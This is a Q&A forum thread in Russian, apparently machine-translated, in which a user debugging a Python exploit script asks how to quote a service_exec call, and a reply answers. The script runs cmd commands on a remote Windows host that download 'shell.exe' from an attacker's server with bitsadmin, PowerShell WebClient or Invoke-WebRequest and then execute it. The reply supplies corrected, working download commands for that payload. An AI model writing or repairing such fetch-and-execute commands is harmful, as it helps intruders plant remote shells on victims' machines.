python скрипт - service_exe (conn, r'cmd / c вопрос - PullRequest
Новая
       4

python скрипт - service_exe (conn, r'cmd / c вопрос

0 голосов
/ 25 апреля 2020 
service_exec(conn, r'cmd /c bitsadmin /transfer pwn /download http://[IP]/shell.exe C:\shell.exe')
service_exec(conn, r'cmd /c /shell.exe')

Это просто отрывок из сценария python. Я могу выполнить его, и он создает pwn.txt; Однако, когда я делаю модификации выше. Я не вижу запросов на загрузку GET на моем SimpleHTTPServer. Я подтвердил, что на моем python -m SimpleHTTPServer 80.

указан правильный каталог. Я хотел попробовать использовать powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"

, поэтому он будет: 

service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"'

, но Я получаю эту ошибку: 

  File "./xxxxxx.py", line 923                                                                                                                                                                                                              
    service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[Ip]/shell.exe','c:\shell.exe')"'                                                                                         
                                                                                                  ^                                                                                                                                        
SyntaxError: invalid syntax

Какой правильный синтаксис для этой команды в этом контексте?

1 Ответ

0 голосов
/ 25 апреля 2020 
service_exec(conn, r'cmd /c powershell -c "(new-object System.Net.WebClient).DownloadFile('http://[IP]/shell.exe','c:\shell.exe')"'

По какой причине cmd / c необходим в приведенном выше? Я только что проверил это из командной строки, и оно работает: 

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('https://fakeurl/exe.exe','c:\shell.exe')"

Альтернативно, вызов веб-запроса имеет более простой синтаксис: 

Invoke-WebRequest -Uri 'http://[IP]/shell.exe' -OutFile 'c:\shell.exe'
Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.

Нет похожих вопросов

...